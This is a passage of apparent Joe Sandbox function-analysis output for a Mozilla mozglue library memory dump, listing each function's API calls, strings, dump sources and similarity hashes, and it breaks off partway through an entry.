Function 6BA9FAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BA9FADC
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9FAE9
GetCurrentThreadId.KERNEL32 ref: 6BA9FB31
GetCurrentThreadId.KERNEL32 ref: 6BA9FB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BA9FBF6
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9FC50

Strings

[D %d/%d] profiler_unregister_thread: %s, xrefs: 6BA9FC94
[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6BA9FD15

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: e57ebc291e8eb2f81bbd4a3751d5097c2782e1f574ec87106d65b18cbddaf104
Instruction ID: de0d3a544c8caa630f948d5a01386380c0e07adc10c6d8ada1c6998cb7aa597e
Opcode Fuzzy Hash: e57ebc291e8eb2f81bbd4a3751d5097c2782e1f574ec87106d65b18cbddaf104
Instruction Fuzzy Hash: 76710E709087008FDF10EF28D544B6AB7E0FF85708F45856EE8558B351EB3AE882CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BA53AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BADE768,?,00003000,00000004), ref: 6BA53AC5
LeaveCriticalSection.KERNEL32(6BADE768,?,00003000,00000004), ref: 6BA53AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6BA53AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6BA53B57
EnterCriticalSection.KERNEL32(6BADE784), ref: 6BA53B81
LeaveCriticalSection.KERNEL32(6BADE784), ref: 6BA53BA3
EnterCriticalSection.KERNEL32(6BADE7B8), ref: 6BA53BAE
LeaveCriticalSection.KERNEL32(6BADE7B8), ref: 6BA53C74
EnterCriticalSection.KERNEL32(6BADE784), ref: 6BA53C8B
LeaveCriticalSection.KERNEL32(6BADE784), ref: 6BA53C9F
LeaveCriticalSection.KERNEL32(6BADE7B8), ref: 6BA53D5C
EnterCriticalSection.KERNEL32(6BADE784), ref: 6BA53D67
LeaveCriticalSection.KERNEL32(6BADE784), ref: 6BA53D8A

Part of subcall function 6BA90D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6BA53DEF), ref: 6BA90D71
Part of subcall function 6BA90D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6BA53DEF), ref: 6BA90D84

Strings

<jemalloc>, xrefs: 6BA53DC7
: (malloc) Error in VirtualFree(), xrefs: 6BA53DCC
MOZ_CRASH(), xrefs: 6BA53DB2

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: 03ab5fb2eac0a6650e282f3c7428bc3f477fde2bf38f5e291a47204d85c69bac
Instruction ID: 79362c273d0fdc8dedef99173c0c575df2602bb4d47f6ce7133f4888efbddc07
Opcode Fuzzy Hash: 03ab5fb2eac0a6650e282f3c7428bc3f477fde2bf38f5e291a47204d85c69bac
Instruction Fuzzy Hash: C591BE72B043048BCF54CF68C8C476AB7F2FBC5710B158668E9529B381DB79DAA1CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BA611B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6BA61213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BA61285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6BA612B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6BA61327

Strings

CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6BA6131B
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6BA612AD
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6BA6120D
MZx, xrefs: 6BA611E1
&, xrefs: 6BA6126B

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: 1f3e2e9f807ba181759a098fa8e74887e84000a84c3f0b2d6ef2a5a21ffe1fb3
Instruction ID: 911187b03ce4557d4d8398bf7c36e77688153cdc7384cf838977e1bf6e238261
Opcode Fuzzy Hash: 1f3e2e9f807ba181759a098fa8e74887e84000a84c3f0b2d6ef2a5a21ffe1fb3
Instruction Fuzzy Hash: C971A0B1E043248ADF109F74C9057EEBBF5BF54389F04169ED445A3240EB386AC5CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BA531C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6BA53217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6BA53236
FreeLibrary.KERNEL32 ref: 6BA5324B
__Init_thread_footer.LIBCMT ref: 6BA53260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6BA5327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA5328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BA532AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BA532D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6BA532E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6BA532F7

Part of subcall function 6BA8AB89: EnterCriticalSection.KERNEL32(6BADE370,?,?,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284), ref: 6BA8AB94
Part of subcall function 6BA8AB89: LeaveCriticalSection.KERNEL32(6BADE370,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284,?,?,6BA756F6), ref: 6BA8ABD1

__aulldiv.LIBCMT ref: 6BA5346B

Strings

KernelBase.dll, xrefs: 6BA53212
QueryInterruptTime, xrefs: 6BA53230

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 0988e7ed07b3334c8bc1f777c07b69f2048f64ed7f876fed8c6cc1a7152e39af
Instruction ID: 298826ffa0c0acc7398c0ee95768374f5ab076a44ca756d3569a746abc2f39e4
Opcode Fuzzy Hash: 0988e7ed07b3334c8bc1f777c07b69f2048f64ed7f876fed8c6cc1a7152e39af
Instruction Fuzzy Hash: 6161D2729087419BCB21CF38C45165BB3E5FFC6350F258B2DE8A6A3290EB35D596CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6BAAD840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAAD85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD918
GetCurrentThreadId.KERNEL32 ref: 6BAAD93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD970
GetCurrentThreadId.KERNEL32 ref: 6BAAD976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAAD982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAAD9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BAADA2E
GetCurrentThreadId.KERNEL32 ref: 6BAADA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAADA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6BAADA91

Part of subcall function 6BA75C50: GetTickCount64.KERNEL32 ref: 6BA75D40
Part of subcall function 6BA75C50: EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA75D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAADAB7

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: ca619b9e1af6a0914cc480f529094ec3f058c25031ed56db5436f5c75730536e
Instruction ID: 82e9e060bbec7a8d04df107ccbf5480be62d8fd21c24b0505177e0b026683002
Opcode Fuzzy Hash: ca619b9e1af6a0914cc480f529094ec3f058c25031ed56db5436f5c75730536e
Instruction Fuzzy Hash: 83718D756043049FCB00CF28C888B5ABBE5FF89310F55866DEC9A9B351DB34E985CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA63A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6BA63BB4
ReleaseSRWLockShared.KERNEL32 ref: 6BA63BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6BA63BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6BA63C91
ReleaseSRWLockShared.KERNEL32 ref: 6BA63CBD
moz_xmalloc.MOZGLUE ref: 6BA63CF1

Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: edc205fe7a831862e50d5b1ebfb6f6033463d3f01e97ac61c39edc69f5f6879b
Instruction ID: ed75278dcf251c2eb9870ab831fc63e361f76cc69d8c0c3bbc5fc22df2cc9f37
Opcode Fuzzy Hash: edc205fe7a831862e50d5b1ebfb6f6033463d3f01e97ac61c39edc69f5f6879b
Instruction Fuzzy Hash: 8EC14EB0908741CFCB24DF28C18465ABBF1FF89344F158A5ED8998B751E735E886CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6BA9EB90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F

GetCurrentThreadId.KERNEL32 ref: 6BA9EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BA9EBAC

Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508

GetCurrentThreadId.KERNEL32 ref: 6BA9EBC1
AcquireSRWLockExclusive.KERNEL32(6BADF4B8,?,?,00000000), ref: 6BA9EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BA9EBE5
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8,00000000), ref: 6BA9EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BA9EC46
CloseHandle.KERNEL32(?), ref: 6BA9EC55
free.MOZGLUE(00000000), ref: 6BA9EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6BA9EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BA9EA9B

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 4250961200-1186885292
Opcode ID: d37064385930b9ef091cddc060e560d7ccdee3275c32721c2d428252dafa6f44
Instruction ID: 2c0bde7723786a514c7ecc71402fd14395f7ea0c70e980c6ccd9087ce7a7f788
Opcode Fuzzy Hash: d37064385930b9ef091cddc060e560d7ccdee3275c32721c2d428252dafa6f44
Instruction Fuzzy Hash: 5C1102B5814204AFCF006F64E949A5B77A5FB89329F04C228FD2997241DB39D886CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA8F2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BA8D9DB), ref: 6BA8F2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6BA8F2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6BA8F386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BA8F347

Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BA8F3C8
free.MOZGLUE(00000000,00000000), ref: 6BA8F3F3
free.MOZGLUE(00000000,00000000), ref: 6BA8F3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6BA8F413

Strings

ntdll.dll, xrefs: 6BA8F2F0

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: a285680ac68e10f4de1bb2a5d16994f326a0ec090ca2f7e1d586c1948b5b0eb6
Instruction ID: 20380f8b242cbf1748ed2d738a5838531b8857fceff69fb9d4fba0ac681c6c01
Opcode Fuzzy Hash: a285680ac68e10f4de1bb2a5d16994f326a0ec090ca2f7e1d586c1948b5b0eb6
Instruction Fuzzy Hash: C34121B1E043069BDF048F28D84179EB7B1EF85354F14882DD82AA7780FB3AE585C781

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB6A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6BADF618), ref: 6BAB6A68
GetCurrentProcess.KERNEL32 ref: 6BAB6A7D
GetCurrentProcess.KERNEL32 ref: 6BAB6AA1
EnterCriticalSection.KERNEL32(6BADF618), ref: 6BAB6AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BAB6AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6BAB6B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6BAB6B65
LeaveCriticalSection.KERNEL32(6BADF618,?,?), ref: 6BAB6B83

Strings

SymInitialize, xrefs: 6BAB6BA3

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: 5020d0c8e4988374430976c848c3d9e30a622847b21ff5f582a2438ae3060648
Instruction ID: 81835c3b8e5037cddac7df7de6ec79b887753a0c8244975fcd9b4560dcc90916
Opcode Fuzzy Hash: 5020d0c8e4988374430976c848c3d9e30a622847b21ff5f582a2438ae3060648
Instruction Fuzzy Hash: 8A418071608384AFDF01CF78C889B9A7BA8EF86304F08857DED598B282DB759545CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6BA9DBB0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 207threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F

GetCurrentThreadId.KERNEL32 ref: 6BA9DBE1
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9DBE9

Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508

??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BA9DC5D
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6BA9DC7F

Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26

Part of subcall function 6BA99A60: GetCurrentThreadId.KERNEL32 ref: 6BA99A95
Part of subcall function 6BA99A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA99A9D
Part of subcall function 6BA99A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BA99ACC
Part of subcall function 6BA99A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA99BA7
Part of subcall function 6BA99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BA99BB8
Part of subcall function 6BA99A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BA99BC9

Part of subcall function 6BA9E8B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BA9DCF5), ref: 6BA9E92D

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9DD1B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9DD44
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9DD58

Part of subcall function 6BA8CBE8: GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
Part of subcall function 6BA8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA

Strings

[I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6BA9DBF2

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpidmalloc$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmoz_xmalloc
String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)
API String ID: 3378208378-1387374313
Opcode ID: abeb617eb282d9f30c87b2b1fc37365c03d2ecd3d438c8272ae7f093f33741e2
Instruction ID: acd205b95fbc4eb45b63cfc85015e5f8c5bf5725c708c99b0f5e6854b8b0c0a6
Opcode Fuzzy Hash: abeb617eb282d9f30c87b2b1fc37365c03d2ecd3d438c8272ae7f093f33741e2
Instruction Fuzzy Hash: 9281C0746407008FCF24EF29D495A6AB7E1FF89308B54892DD89787741EB38E9CACB51

Uniqueness

Uniqueness Score: -1.00%

Function 6BAA0000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F

GetCurrentThreadId.KERNEL32 ref: 6BAA0039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BAA0041
GetCurrentThreadId.KERNEL32 ref: 6BAA0075
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BAA0082
moz_xmalloc.MOZGLUE(00000048), ref: 6BAA0090
free.MOZGLUE(?), ref: 6BAA0104
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BAA011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6BAA005B

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: 69adda8df0571970f765d69c4344690f4e172047dee26aa59725d7e85ca60431
